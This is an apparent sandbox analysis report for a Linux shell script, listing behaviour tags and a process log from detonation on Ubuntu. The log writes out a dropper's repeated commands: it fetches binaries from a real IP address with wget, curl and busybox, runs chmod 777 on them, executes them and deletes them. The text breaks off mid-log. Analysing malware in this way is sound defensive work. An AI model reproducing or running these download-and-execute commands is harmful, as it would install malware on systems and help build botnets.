Analysis Overview
SHA256
e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849
Threat Level: Shows suspicious behavior
The file e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 03:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 03:39
Reported
2024-11-20 03:42
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
60s
Max time network
135s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | N/A |
| N/A | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | N/A |
| N/A | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | N/A |
| N/A | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | N/A |
| N/A | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | N/A |
| N/A | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | N/A |
| N/A | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | N/A |
| N/A | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | N/A |
| N/A | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | N/A |
| N/A | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | N/A |
| N/A | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | N/A |
| N/A | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | N/A |
| N/A | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | N/A |
| N/A | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | N/A |
| N/A | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | N/A |
| N/A | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | N/A |
| N/A | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | N/A |
| N/A | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | N/A |
| N/A | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | N/A |
| N/A | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | N/A |
| N/A | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | N/A |
| N/A | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | N/A |
| N/A | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | N/A |
| N/A | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | N/A |
| N/A | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | N/A |
| N/A | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | N/A |
| N/A | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | N/A |
| N/A | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /usr/bin/curl | N/A |
Processes
/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh
[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/chmod
[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/rm
[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/wget
[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/chmod
[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/rm
[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/wget
[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/chmod
[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/rm
[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/wget
[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/chmod
[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/rm
[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/wget
[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/chmod
[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/rm
[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/wget
[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/chmod
[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/rm
[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/wget
[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/chmod
[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/rm
[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/wget
[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/chmod
[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/rm
[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/wget
[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/chmod
[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/rm
[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/wget
[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/chmod
[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/rm
[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/usr/bin/wget
[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/chmod
[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/rm
[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/wget
[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/chmod
[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/rm
[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/wget
[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/chmod
[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/rm
[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/wget
[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/chmod
[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/rm
[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/wget
[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/chmod
[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/rm
[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/wget
[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/chmod
[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/rm
[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/wget
[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/chmod
[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/rm
[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/wget
[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/chmod
[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/rm
[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/wget
[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/chmod
[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/rm
[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/wget
[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/chmod
[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/rm
[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/wget
[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/chmod
[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/rm
[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/wget
[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/chmod
[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/rm
[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/wget
[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/chmod
[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/rm
[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/wget
[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/chmod
[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/rm
[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/wget
[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/chmod
[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/rm
[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/wget
[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/chmod
[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/rm
[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/wget
[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/chmod
[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/rm
[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/wget
